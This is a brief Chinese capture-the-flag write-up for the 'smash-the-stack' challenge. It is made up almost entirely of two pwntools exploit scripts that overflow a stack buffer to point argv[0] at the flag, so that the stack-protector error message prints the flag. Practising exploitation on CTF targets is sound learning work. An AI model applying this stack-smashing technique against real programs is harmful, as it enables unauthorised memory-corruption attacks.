根据提示:stderr!和32C3的readme同样,原理看上篇,这里贴两个exppython
#! /usr/bin/env python # coding=utf-8 from pwn import * #io = process('./smash-the-stack') io = remote('hackme.inndy.tw', 7717) argv_addr = 0xffffcfa4 buf_addr = 0xffffcee8 flag_addr = 0x804a060 payload = 'a' * (argv_addr - buf_addr) + p32(flag_addr) io.recvuntil('the flag') io.sendline(payload) io.interactive()
另一个:code
#!/usr/bin/env python # coding=utf-8 from pwn import * io = remote("hackme.inndy.tw", 7717) flag_addr = 0x804A060 io.recvuntil("the flag\n") payload = p32(flag_addr) * 0x300 io.sendline(payload) io.interactive()